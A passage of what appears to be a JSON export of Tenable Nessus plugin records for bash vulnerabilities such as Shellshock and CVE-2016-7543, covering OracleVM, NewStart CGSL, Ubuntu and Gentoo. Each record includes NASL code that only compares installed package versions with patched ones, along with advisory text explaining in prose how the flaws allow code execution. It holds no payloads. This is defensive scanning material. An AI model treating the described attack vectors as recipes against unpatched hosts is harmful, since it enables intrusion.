bash-doc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T15:38:03", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - Fix signal handling in read builtin Resolves: #1421926\n\n - CVE-2016-9401 - Fix crash when '-' is passed as second sign to popd Resolves: #1396383\n\n - CVE-2016-7543 - Fix for arbitrary code execution via SHELLOPTS+PS4 variables Resolves: #1379630\n\n - CVE-2016-0634 - Fix for arbitrary code execution via malicious hostname Resolves: #1377613\n\n - Avoid crash in parameter expansion while expanding long strings Resolves: #1359142\n\n - Stop reading input when SIGHUP is received Resolves:\n #1325753\n\n - Bash leaks memory while doing pattern removal in parameter expansion Resolves: #1283829\n\n - Fix a race condition in saving bash history on shutdown Resolves: #1325753\n\n - Bash shouldn't ignore bash --debugger without a dbger installed Related: #1260568\n\n - Wrong parsing inside for loop and brackets Resolves:\n #1207803\n\n - IFS incorrectly splitting herestrings Resolves: #1250070\n\n - Case in a for loop in a subshell causes a syntax error Resolves: #1240994\n\n - Bash shouldn't ignore bash --debugger without a dbger installed Resolves: #1260568\n\n - Bash leaks memory when repeatedly doing a pattern-subst Resolves: #1207042\n\n - Bash hangs when a signal is received Resolves: #868846", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-03-30T00:00:00", "type": "nessus", "title": "OracleVM 3.3 / 3.4 : bash (OVMSA-2017-0050)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2016-0634", "CVE-2016-7543", "CVE-2016-9401"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:bash", "cpe:/o:oracle:vm_server:3.3", "cpe:/o:oracle:vm_server:3.4"], "id": "ORACLEVM_OVMSA-2017-0050.NASL", "href": "https://www.tenable.com/plugins/nessus/99077", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2017-0050.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99077);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-7169\",\n \"CVE-2016-0634\",\n \"CVE-2016-7543\",\n \"CVE-2016-9401\"\n );\n script_bugtraq_id(70137);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"OracleVM 3.3 / 3.4 : bash (OVMSA-2017-0050)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote OracleVM host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Fix signal handling in read builtin Resolves: #1421926\n\n - CVE-2016-9401 - Fix crash when '-' is passed as second\n sign to popd Resolves: #1396383\n\n - CVE-2016-7543 - Fix for arbitrary code execution via\n SHELLOPTS+PS4 variables Resolves: #1379630\n\n - CVE-2016-0634 - Fix for arbitrary code execution via\n malicious hostname Resolves: #1377613\n\n - Avoid crash in parameter expansion while expanding long\n strings Resolves: #1359142\n\n - Stop reading input when SIGHUP is received Resolves:\n #1325753\n\n - Bash leaks memory while doing pattern removal in\n parameter expansion Resolves: #1283829\n\n - Fix a race condition in saving bash history on shutdown\n Resolves: #1325753\n\n - Bash shouldn't ignore bash --debugger without a dbger\n installed Related: #1260568\n\n - Wrong parsing inside for loop and brackets Resolves:\n #1207803\n\n - IFS incorrectly splitting herestrings Resolves: #1250070\n\n - Case in a for loop in a subshell causes a syntax error\n Resolves: #1240994\n\n - Bash shouldn't ignore bash --debugger without a dbger\n installed Resolves: #1260568\n\n - Bash leaks memory when repeatedly doing a pattern-subst\n Resolves: #1207042\n\n - Bash hangs when a signal is received Resolves: #868846\");\n # https://oss.oracle.com/pipermail/oraclevm-errata/2017-March/000659.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?49d2a21e\");\n # https://oss.oracle.com/pipermail/oraclevm-errata/2017-March/000669.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?85c795b3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"(3\\.3|3\\.4)\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3 / 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"bash-4.1.2-48.el6\")) flag++;\n\nif (rpm_check(release:\"OVS3.4\", reference:\"bash-4.1.2-48.el6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-10T03:23:10", "description": "The remote NewStart CGSL host, running version MAIN 6.02, has bash packages installed that are affected by multiple vulnerabilities:\n\n - GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271. (CVE-2014-7169)\n\n - The expansion of '\\h' in the prompt string in bash 4.3 allows remote authenticated users to execute arbitrary code via shell metacharacters placed in 'hostname' of a machine. (CVE-2016-0634)\n\n - Bash before 4.4 allows local users to execute arbitrary commands with root privileges via crafted SHELLOPTS and PS4 environment variables. (CVE-2016-7543)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-10-27T00:00:00", "type": "nessus", "title": "NewStart CGSL MAIN 6.02 : bash Multiple Vulnerabilities (NS-SA-2021-0118)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2016-0634", "CVE-2016-7543"], "modified": "2022-05-09T00:00:00", "cpe": ["p-cpe:/a:zte:cgsl_main:bash", "p-cpe:/a:zte:cgsl_main:bash-debuginfo", "p-cpe:/a:zte:cgsl_main:bash-debugsource", "p-cpe:/a:zte:cgsl_main:bash-devel", "p-cpe:/a:zte:cgsl_main:bash-doc", "cpe:/o:zte:cgsl_main:6"], "id": "NEWSTART_CGSL_NS-SA-2021-0118_BASH.NASL", "href": "https://www.tenable.com/plugins/nessus/154582", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from ZTE advisory NS-SA-2021-0118. The text\n# itself is copyright (C) ZTE, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154582);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\"CVE-2014-7169\", \"CVE-2016-0634\", \"CVE-2016-7543\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"NewStart CGSL MAIN 6.02 : bash Multiple Vulnerabilities (NS-SA-2021-0118)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote NewStart CGSL host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote NewStart CGSL host, running version MAIN 6.02, has bash packages installed that are affected by multiple\nvulnerabilities:\n\n - GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in\n the values of environment variables, which allows remote attackers to write to files or possibly have\n unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand\n feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by\n unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege\n boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for\n CVE-2014-6271. (CVE-2014-7169)\n\n - The expansion of '\\h' in the prompt string in bash 4.3 allows remote authenticated users to execute\n arbitrary code via shell metacharacters placed in 'hostname' of a machine. (CVE-2016-0634)\n\n - Bash before 4.4 allows local users to execute arbitrary commands with root privileges via crafted\n SHELLOPTS and PS4 environment variables. (CVE-2016-7543)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/notice/NS-SA-2021-0118\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2014-7169\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2016-0634\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2016-7543\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the vulnerable CGSL bash packages. Note that updated packages may not be available yet. Please contact ZTE for\nmore information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2016-7543\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:bash-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:bash-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:zte:cgsl_main:6\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"NewStart CGSL Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/ZTE-CGSL/release\", \"Host/ZTE-CGSL/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item('Host/ZTE-CGSL/release');\nif (isnull(release) || release !~ \"^CGSL (MAIN|CORE)\") audit(AUDIT_OS_NOT, 'NewStart Carrier Grade Server Linux');\n\nif (release !~ \"CGSL MAIN 6.02\")\n audit(AUDIT_OS_NOT, 'NewStart CGSL MAIN 6.02');\n\nif (!get_kb_item('Host/ZTE-CGSL/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'NewStart Carrier Grade Server Linux', cpu);\n\nvar flag = 0;\n\nvar pkgs = {\n 'CGSL MAIN 6.02': [\n 'bash-4.4.19-10.el8.cgslv6_2.0.1.g98f2d97',\n 'bash-debuginfo-4.4.19-10.el8.cgslv6_2.0.1.g98f2d97',\n 'bash-debugsource-4.4.19-10.el8.cgslv6_2.0.1.g98f2d97',\n 'bash-devel-4.4.19-10.el8.cgslv6_2.0.1.g98f2d97',\n 'bash-doc-4.4.19-10.el8.cgslv6_2.0.1.g98f2d97'\n ]\n};\nvar pkg_list = pkgs[release];\n\nforeach (pkg in pkg_list)\n if (rpm_check(release:'ZTE ' + release, reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'bash');\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:36:50", "description": "Bernd Dietzel discovered that Bash incorrectly expanded the hostname when displaying the prompt. If a remote attacker were able to modify a hostname, this flaw could be exploited to execute arbitrary code. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 16.10. (CVE-2016-0634)\n\nIt was discovered that Bash incorrectly handled the SHELLOPTS and PS4 environment variables. A local attacker could use this issue to execute arbitrary code with root privileges. This issue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 16.10. (CVE-2016-7543)\n\nIt was discovered that Bash incorrectly handled the popd command. A remote attacker could possibly use this issue to bypass restricted shells. (CVE-2016-9401)\n\nIt was discovered that Bash incorrectly handled path autocompletion. A local attacker could possibly use this issue to execute arbitrary code. This issue only affected Ubuntu 17.04. (CVE-2017-5932).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-18T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS / 16.04 LTS / 16.10 / 17.04 : bash vulnerabilities (USN-3294-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0634", "CVE-2016-7543", "CVE-2016-9401", "CVE-2017-5932"], "modified": "2019-09-18T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:bash", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:16.10", "cpe:/o:canonical:ubuntu_linux:17.04"], "id": "UBUNTU_USN-3294-1.NASL", "href": "https://www.tenable.com/plugins/nessus/100268", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3294-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100268);\n script_version(\"3.6\");\n script_cvs_date(\"Date: 2019/09/18 12:31:47\");\n\n script_cve_id(\"CVE-2016-0634\", \"CVE-2016-7543\", \"CVE-2016-9401\", \"CVE-2017-5932\");\n script_xref(name:\"USN\", value:\"3294-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 16.04 LTS / 16.10 / 17.04 : bash vulnerabilities (USN-3294-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Bernd Dietzel discovered that Bash incorrectly expanded the hostname\nwhen displaying the prompt. If a remote attacker were able to modify a\nhostname, this flaw could be exploited to execute arbitrary code. This\nissue only affected Ubuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu\n16.10. (CVE-2016-0634)\n\nIt was discovered that Bash incorrectly handled the SHELLOPTS and PS4\nenvironment variables. A local attacker could use this issue to\nexecute arbitrary code with root privileges. This issue only affected\nUbuntu 14.04 LTS, Ubuntu 16.04 LTS and Ubuntu 16.10. (CVE-2016-7543)\n\nIt was discovered that Bash incorrectly handled the popd command. A\nremote attacker could possibly use this issue to bypass restricted\nshells. (CVE-2016-9401)\n\nIt was discovered that Bash incorrectly handled path autocompletion. A\nlocal attacker could possibly use this issue to execute arbitrary\ncode. This issue only affected Ubuntu 17.04. (CVE-2017-5932).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3294-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04|16\\.04|16\\.10|17\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04 / 16.04 / 16.10 / 17.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"bash\", pkgver:\"4.3-7ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"bash\", pkgver:\"4.3-14ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"16.10\", pkgname:\"bash\", pkgver:\"4.3-15ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"bash\", pkgver:\"4.4-2ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:48:09", "description": "The remote host is affected by the vulnerability described in GLSA-201410-01 (Bash: Multiple vulnerabilities)\n\n Florian Weimer, Todd Sabin, Michal Zalewski et al. discovered further parsing flaws in Bash. The unaffected Gentoo packages listed in this GLSA contain the official patches to fix the issues tracked as CVE-2014-6277, CVE-2014-7186, and CVE-2014-7187. Furthermore, the official patch known as “function prefix patch” is included which prevents the exploitation of CVE-2014-6278.\n Impact :\n\n A remote attacker could exploit these vulnerabilities to execute arbitrary commands or cause a Denial of Service condition via various vectors.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": null, "vector": null}, "published": "2014-10-06T00:00:00", "type": "nessus", "title": "GLSA-201410-01 : Bash: Multiple vulnerabilities (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:bash", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201410-01.NASL", "href": "https://www.tenable.com/plugins/nessus/78060", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201410-01.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78060);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-6277\", \"CVE-2014-6278\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_bugtraq_id(70152, 70154, 70165, 70166);\n script_xref(name:\"GLSA\", value:\"201410-01\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n\n script_name(english:\"GLSA-201410-01 : Bash: Multiple vulnerabilities (Shellshock)\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201410-01\n(Bash: Multiple vulnerabilities)\n\n Florian Weimer, Todd Sabin, Michal Zalewski et al. discovered further\n parsing flaws in Bash. The unaffected Gentoo packages listed in this GLSA\n contain the official patches to fix the issues tracked as CVE-2014-6277,\n CVE-2014-7186, and CVE-2014-7187. Furthermore, the official patch known\n as “function prefix patch” is included which prevents the\n exploitation of CVE-2014-6278.\n \nImpact :\n\n A remote attacker could exploit these vulnerabilities to execute\n arbitrary commands or cause a Denial of Service condition via various\n vectors.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201410-01\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Bash 3.1 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-shells/bash-3.1_p22:3.1'\n All Bash 3.2 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-shells/bash-3.2_p56:3.2'\n All Bash 4.0 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-shells/bash-4.0_p43:4.0'\n All Bash 4.1 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-shells/bash-4.1_p16:4.1'\n All Bash 4.2 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-shells/bash-4.2_p52'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/04\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/06\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif 